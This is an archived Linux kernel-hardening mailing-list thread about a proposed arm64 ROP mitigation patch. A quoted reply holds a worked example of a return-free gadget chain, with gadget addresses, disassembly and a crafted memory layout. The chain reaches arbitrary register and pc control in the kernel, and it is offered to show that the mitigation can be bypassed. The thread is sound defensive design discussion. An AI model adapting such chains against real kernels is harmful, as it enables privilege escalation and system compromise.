|
Message-ID: <CAKv+Gu9qr-Rup7H=JiC+2ktfy34udnghnhnW3aB0mV=d1+x5-Q@mail.gmail.com>
Date: Mon, 13 Aug 2018 10:39:27 +0300
From: Ard Biesheuvel <ard.biesheuvel@...aro.org>
To: Mark Brand <markbrand@...gle.com>
Cc: Catalin Marinas <catalin.marinas@....com>, Christoffer Dall <christoffer.dall@....com>,
Julien Thierry <julien.thierry@....com>, Kees Cook <keescook@...omium.org>,
Kernel Hardening <kernel-hardening@...ts.openwall.com>,
Laura Abbott <labbott@...oraproject.org>, Mark Rutland <mark.rutland@....com>,
Robin Murphy <robin.murphy@....com>, Will Deacon <will.deacon@....com>,
linux-arm-kernel <linux-arm-kernel@...ts.infradead.org>
Subject: Re: [RFC/PoC PATCH 0/3] arm64: basic ROP mitigation
On Wed 8 Aug 2018 at 19:09, Mark Brand <markbrand@...gle.com> wrote:
> On Tue, Aug 7, 2018 at 2:22 AM Ard Biesheuvel <ard.biesheuvel@...aro.org>
> wrote:
> >
> > On 7 August 2018 at 05:05, Mark Brand <markbrand@...gle.com> wrote:
> > > I think the phrasing of "limit kernel attack surface against ROP
> attacks" is
> > > confusing and misleading. ROP does not describe a class of bugs,
> > > vulnerabilities or attacks against the kernel - it's just one of many
> > > code-reuse techniques that can be used by an attacker while exploiting
> a
> > > vulnerability. But that's kind of off-topic!
> > >
> > > I think what this thread is talking about is implementing extremely
> > > coarse-grained reverse-edge control-flow-integrity, in that a return
> can
> > > only return to the address following a legitimate call, but it can
> return to
> > > any of those.
> > >
> >
> > Indeed. Apologies for not mastering the lingo, but it is indeed about
> > no longer being able to subvert function returns into jumping to
> > arbitrary places in the code.
> >
> > > I suspect there's not much benefit to this, since (as far as I can
> see) the
> > > assumption is that an attacker has the means to direct flow of
> execution as
> > > far as taking complete control of the (el1) stack before executing any
> ROP
> > > payload.
> > >
> > > At that point, I think it's highly unlikely an attacker needs to chain
> > > gadgets through return instructions at all - I suspect there are a few
> > > places in the kernel where it is necessary to load the entire register
> > > context from a register that is not the stack pointer, and it would
> likely
> > > not be more than a minor inconvenience to an attacker to use these (and
> > > chaining through branch register) instructions instead of chaining
> through
> > > return instructions.
> > >
> > > I'd have to take a closer look at an arm64 kernel image to be sure
> though -
> > > I'll do that when I get a chance and update...
> > >
> >
> > Thanks. Reloading all registers from an arbitrary offset register
> > should occur rarely, no? Could we work around that?
>
> I forgot about the gmail-html-by-default... Hopefully everyone else
> can read the quotes though :-/.
>
> I took a look and have put together an example rop chain that doesn't
> use any return instructions that you could instrument, that will call
> an arbitrary kernel function with controlled parameters (at least x0 -
> x4, would have to probably mess with some alignment and add a
> repetition of the last gadget to get all register control. It assumes
> that the attacker has control over the memory pointed to by x0 at the
> point where they get control of pc, and that they know where that
> memory is located (but it would also work if they just controlled the
> memory pointed to by x0, and had another chunk of kernel memory they
> control at a known address. Seems like a pretty reasonable starting
> assumption, and I'm sure anyone with a little motivation could produce
> similar chains for other starting conditions, this just seemed the
> "most likely" reasonable conditions to me.
>
Thanks a lot for taking the time to put together this excellent example. I
will study it in more detail after I return from my vacation.
Ard.
> There are two basic principles used here -
>
> (1) chaining through the mempool_free function, I found this really
> quickly when searching for useful gadgets based off x0
>
> void mempool_free(void *element, mempool_t *pool)
> {
> unsigned long flags;
>
> if (unlikely(element == NULL))
> return;
>
> /* snip */
> smp_rmb();
>
> /* snip */
> if (unlikely(pool->curr_nr < pool->min_nr)) {
> spin_lock_irqsave(&pool->lock, flags);
> if (likely(pool->curr_nr < pool->min_nr)) {
> add_element(pool, element);
> spin_unlock_irqrestore(&pool->lock, flags);
> wake_up(&pool->wait);
> return;
> }
> spin_unlock_irqrestore(&pool->lock, flags);
> }
>
> pool->free(element, pool->pool_data);
> }
>
> Since the callsites for this function usually load the arguments
> through some registers, and the function to call gets pulled out of
> one of those arguments, it's easy to get a couple of registers loaded
> here and then the chain continue.
>
> (2) loading complete register state using kernel_exit macro.
>
> Since the kernel_exit macro actually loads spsr_el1 and elr_el1 from
> registers, I think that you can let the eret return to anywhere in el1
> without dropping to el0, since the same handler is used for "exiting
> the kernel" when a hardware interrupt interrupts the kernel itself. I
> didn't fill out the necessary register values in the chain below,
> since I don't anyway have a device around to test this on right now.
>
> I'm not sure that you could really robustly protect this eret; I
> suppose that you could try and somehow validate the saved register
> state, but given that it would be happening on every exception return,
> I suspect it would be expensive.
>
> 0:dispatch_io + yy (mempool_free gadget, appears in plenty of other
> places.)
> ffffff8008a340d4 084c41a9 ldp x8, x19, [x0, #0x10]
> ffffff8008a340d8 190040f9 ldr x25, [x0]
> ffffff8008a340dc 1a1040f9 ldr x26, [x0, #0x20]
> ffffff8008a340e0 010140f9 ldr x1, [x8]
> ffffff8008a340e4 ed80dd97 bl mempool_free
>
> mempool_free:
> ffffff8008194498 f44fbea9 stp x20, x19, [sp, #-0x20
> {__saved_x20} {__saved_x19}]!
> ffffff800819449c fd7b01a9 stp x29, x30, [sp, #0x10
> {__saved_x29} {__saved_x30}]
> ffffff80081944a0 fd430091 add x29, sp, #0x10 {__saved_x29}
> ffffff80081944a4 f30301aa mov x19, x1
> ffffff80081944a8 f40300aa mov x20, x0
> ffffff80081944ac 340100b4 cbz x20, 0xffffff80081944d0
>
> ffffff80081944b0 bf3903d5 dmb ishld
> ffffff80081944b4 68a64029 ldp w8, w9, [x19, #0x4]
> ffffff80081944b8 3f01086b cmp w9, w8
> ffffff80081944bc 0b010054 b.lt 0xffffff80081944dc
>
> ffffff80081944c0 681640f9 ldr x8, [x19, #0x28]
> ffffff80081944c4 610e40f9 ldr x1, [x19, #0x18]
> ffffff80081944c8 e00314aa mov x0, x20
> ffffff80081944cc 00013fd6 blr x8
>
> ffffff80081944d0 fd7b41a9 ldp x29, x30, [sp, #0x10
> {__saved_x29} {__saved_x30}]
> ffffff80081944d4 f44fc2a8 ldp x20, x19, [sp {__saved_x20}
> {__saved_x19}], #0x20
> ffffff80081944d8 c0035fd6 ret
>
> ffffff8008a340e8 e00319aa mov x0, x25
> ffffff8008a340ec e1031aaa mov x1, x26
> ffffff8008a340f0 60023fd6 blr x19
>
> 1:el1_irq + xx - (x1, x26) -> sp control
> ffffff800808314c 5f030091 mov sp, x26
> ffffff8008083150 fd4fbfa9 stp x29, x19, [sp, #-0x10]! {__saved_x0}
> ffffff8008083154 fd030091 mov x29, sp
> ffffff8008083158 20003fd6 blr x1
>
> 2:ipc_log_extract + xx (sp, x19) -> survival
> ffffff800817c35c e0c30091 add x0, sp, #0x30 {var_170}
> ffffff800817c360 e1430091 add x1, sp, #0x10 {var_190}
> ffffff800817c364 60023fd6 blr x19
>
> 3:dispatch_io + xx (mempool_free gadget, appears in plenty of other
> places.)
> ffffff8008a342cc 084c41a9 ldp x8, x19, [x0, #0x10]
> ffffff8008a342d0 140040f9 ldr x20, [x0]
> ffffff8008a342d4 151040f9 ldr x21, [x0, #0x20]
> ffffff8008a342d8 010140f9 ldr x1, [x8]
> ffffff8008a342dc 6f80dd97 bl mempool_free
>
> mempool_free:
> ffffff8008194498 f44fbea9 stp x20, x19, [sp, #-0x20
> {__saved_x20} {__saved_x19}]!
> ffffff800819449c fd7b01a9 stp x29, x30, [sp, #0x10
> {__saved_x29} {__saved_x30}]
> ffffff80081944a0 fd430091 add x29, sp, #0x10 {__saved_x29}
> ffffff80081944a4 f30301aa mov x19, x1
> ffffff80081944a8 f40300aa mov x20, x0
> ffffff80081944ac 340100b4 cbz x20, 0xffffff80081944d0
>
> ffffff80081944b0 bf3903d5 dmb ishld
> ffffff80081944b4 68a64029 ldp w8, w9, [x19, #0x4]
> ffffff80081944b8 3f01086b cmp w9, w8
> ffffff80081944bc 0b010054 b.lt 0xffffff80081944dc
>
> ffffff80081944c0 681640f9 ldr x8, [x19, #0x28]
> ffffff80081944c4 610e40f9 ldr x1, [x19, #0x18]
> ffffff80081944c8 e00314aa mov x0, x20
> ffffff80081944cc 00013fd6 blr x8
>
> ffffff80081944d0 fd7b41a9 ldp x29, x30, [sp, #0x10
> {__saved_x29} {__saved_x30}]
> ffffff80081944d4 f44fc2a8 ldp x20, x19, [sp {__saved_x20}
> {__saved_x19}], #0x20
> ffffff80081944d8 c0035fd6 ret
>
> ffffff8008a342e0 e00314aa mov x0, x20
> ffffff8008a342e4 e10315aa mov x1, x21
> ffffff8008a342e8 60023fd6 blr x19
>
> 4:bus_sort_breadthfirst + xx - (x26)
> ffffff8008683cc8 561740f9 ldr x22, [x26, #0x28]
> ffffff8008683ccc e00315aa mov x0, x21
> ffffff8008683cd0 e10316aa mov x1, x22
> ffffff8008683cd4 80023fd6 blr x20
>
> 5:kernel_exit (macro) - (x21, x22, sp) -> full register control & pc
> control
> ffffff8008082f64 354018d5 msr elr_el1, x21
> ffffff8008082f68 164018d5 msr spsr_el1, x22
> ffffff8008082f6c e00740a9 ldp x0, x1, [sp {var_130} {var_128}]
> ffffff8008082f70 e20f41a9 ldp x2, x3, [sp, #0x10 {var_120}
> {var_118}]
> ffffff8008082f74 e41742a9 ldp x4, x5, [sp, #0x20 {var_110}
> {var_108}]
> ffffff8008082f78 e61f43a9 ldp x6, x7, [sp, #0x30 {var_100} {var_f8}]
> ffffff8008082f7c e82744a9 ldp x8, x9, [sp, #0x40 {var_f0} {var_e8}]
> ffffff8008082f80 ea2f45a9 ldp x10, x11, [sp, #0x50 {var_e0}
> {var_d8}]
> ffffff8008082f84 ec3746a9 ldp x12, x13, [sp, #0x60 {var_d0}
> {var_c8}]
> ffffff8008082f88 ee3f47a9 ldp x14, x15, [sp, #0x70 {var_c0}
> {var_b8}]
> ffffff8008082f8c f04748a9 ldp x16, x17, [sp, #0x80 {var_b0}
> {var_a8}]
> ffffff8008082f90 f24f49a9 ldp x18, x19, [sp, #0x90 {var_a0}
> {var_98}]
> ffffff8008082f94 f4574aa9 ldp x20, x21, [sp, #0xa0 {var_90}
> {var_88}]
> ffffff8008082f98 f65f4ba9 ldp x22, x23, [sp, #0xb0 {var_80}
> {var_78}]
> ffffff8008082f9c f8674ca9 ldp x24, x25, [sp, #0xc0 {var_70}
> {var_68}]
> ffffff8008082fa0 fa6f4da9 ldp x26, x27, [sp, #0xd0 {var_60}
> {var_58}]
> ffffff8008082fa4 fc774ea9 ldp x28, x29, [sp, #0xe0 {var_50}
> {var_48}]
> ffffff8008082fa8 fe7b40f9 ldr x30, [sp, #0xf0 {var_40}]
> ffffff8008082fac ffc30491 add sp, sp, #0x130
> ffffff8008082fb0 e0039fd6 eret
>
>
> ptr = 0000414100000000 = initial x0
>
> 0000: 2525252525252525 ; (0:40d8) x25
> 0008: 0000414100000030 ; (0:40e0) x1
> 0010: 0000414100000000 ; (0:40d4) x8
> 0018: ffffff8008a342cc ; (0:40d4) x19 -> branch target (2:c364)
> 0020: 0000414100000070 ; (0:40dc) x26 -> sp (1:314c)
> 0028:
> 0030: 8888888899999999 ; (0:44b4) w8, w9
> 0038:
> 0040:
> 0048: ffffff800817c35c ; (0:44c4) x1 -> branch target (1:3158)
> 0050:
> 0058: ffffff800808314c ; (0:44c0) x8 -> branch target (0:44c4)
> 0060: xxxxxxxxxxxxxxxx ; saved x29 <-- sp@
> (1:3154)
> 0068: xxxxxxxxxxxxxxxx ; saved x19
> 0070: ; <--
> sp@(1:314c), (5:2f64)
> 0078:
> 0080:
> 0088:
> 0090:
> 0098: 2222222222222222 ; (4:3cc8) x22 -> spsr_el1
> 00a0: ffffff8008082f64 ; (3:42d0) x20 -> branch target (4:3cd4) <-- x0@
> (2:c35c)
> 00a8: 00004141000000d0 ; (3:42d8) x1
> 00b0: 00004141000000a0 ; (3:42cc) x8
> 00b8: 1919191919191919 ; (3:42cc) x19
> 00c0: 2121212121212121 ; (3:42d4) x21 -> elr_el1
> 00c8:
> 00d0: 8888888899999999 ; (3:44b4) w8, w9
> 00d8:
> 00e0:
> 00e8: 1111111111111111 ; (3:44c4) x1
> 00f0:
> 00f8: ffffff800808314c ; (3:44c0) x8 -> branch target (3:44c4)
> >
> > > On Mon, 6 Aug 2018 at 19:28, Ard Biesheuvel <ard.biesheuvel@...aro.org
> >
> > > wrote:
> > >>
> > >> On 6 August 2018 at 21:50, Kees Cook <keescook@...omium.org> wrote:
> > >> > On Mon, Aug 6, 2018 at 12:35 PM, Ard Biesheuvel
> > >> > <ard.biesheuvel@...aro.org> wrote:
> > >> >> On 6 August 2018 at 20:49, Kees Cook <keescook@...omium.org>
> wrote:
> > >> >>> On Mon, Aug 6, 2018 at 10:45 AM, Robin Murphy <
> robin.murphy@....com>
> > >> >>> wrote:
> > >> >>>> I guess what I'm getting at is that if the protection mechanism
> is
> > >> >>>> "always
> > >> >>>> return with SP outside TTBR1", there seems little point in going
> > >> >>>> through the
> > >> >>>> motions if SP in TTBR0 could still be valid and allow an attack
> to
> > >> >>>> succeed
> > >> >>>> anyway; this is basically just me working through a
> justification for
> > >> >>>> saying
> > >> >>>> the proposed scheme needs "depends on ARM64_PAN ||
> > >> >>>> ARM64_SW_TTBR0_PAN",
> > >> >>>> making it that much uglier for v8.0 CPUs...
> > >> >>>
> > >> >>> I think anyone with v8.0 CPUs interested in this mitigation would
> also
> > >> >>> very much want PAN emulation. If a "depends on" isn't desired,
> what
> > >> >>> about "imply" in the Kconfig?
> > >> >>>
> > >> >>
> > >> >> Yes, but actually, using bit #0 is maybe a better alternative in
> any
> > >> >> case. You can never dereference SP with bit #0 set, regardless of
> > >> >> whether the address points to user or kernel space, and my concern
> > >> >> about reloading sp from x29 doesn't really make sense, given that
> x29
> > >> >> is always assigned from sp right after pushing x29 and x30 in the
> > >> >> function prologue, and sp only gets restored from x29 in the
> epilogue
> > >> >> when there is a stack frame to begin with, in which case we add #1
> to
> > >> >> sp again before returning from the function.
> > >> >
> > >> > Fair enough! :)
> > >> >
> > >> >> The other code gets a lot cleaner as well.
> > >> >>
> > >> >> So for the return we'll have
> > >> >>
> > >> >> ldp x29, x30, [sp], #nn
> > >> >>>>add sp, sp, #0x1
> > >> >> ret
> > >> >>
> > >> >> and for the function call
> > >> >>
> > >> >> bl <foo>
> > >> >>>>mov x30, sp
> > >> >>>>bic sp, x30, #1
> > >> >>
> > >> >> The restore sequence in entry.s:96 (which has no spare registers)
> gets
> > >> >> much simpler as well:
> > >> >>
> > >> >> --- a/arch/arm64/kernel/entry.S
> > >> >> +++ b/arch/arm64/kernel/entry.S
> > >> >> @@ -95,6 +95,15 @@ alternative_else_nop_endif
> > >> >> */
> > >> >> add sp, sp, x0 // sp' = sp + x0
> > >> >> sub x0, sp, x0 // x0' = sp' - x0 = (sp + x0) - x0
> = sp
> > >> >> +#ifdef CONFIG_ARM64_ROP_SHIELD
> > >> >> + tbnz x0, #0, 1f
> > >> >> + .subsection 1
> > >> >> +1: sub x0, x0, #1
> > >> >> + sub sp, sp, #1
> > >> >> + b 2f
> > >> >> + .previous
> > >> >> +2:
> > >> >> +#endif
> > >> >> tbnz x0, #THREAD_SHIFT, 0f
> > >> >> sub x0, sp, x0 // x0'' = sp' - x0' = (sp + x0) -
> sp =
> > >> >> x0
> > >> >> sub sp, sp, x0 // sp'' = sp' - x0 = (sp + x0) -
> x0 =
> > >> >> sp
> > >> >
> > >> > I get slightly concerned about "add" vs "clear bit", but I don't
> see a
> > >> > real way to chain a lot of "add"s to get to avoid the unaligned
> > >> > access. Is "or" less efficient than "add"?
> > >> >
> > >>
> > >> Yes. The stack pointer is special on arm64, and can only be used with
> > >> a limited set of ALU instructions. So orring #1 would involve 'mov
> > >> <reg>, sp ; orr sp, <reg>, #1' like in the 'bic' case above, which
> > >> requires a scratch register as well.
>
Content of type "text/html" skipped
Powered by blists - more mailing lists
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.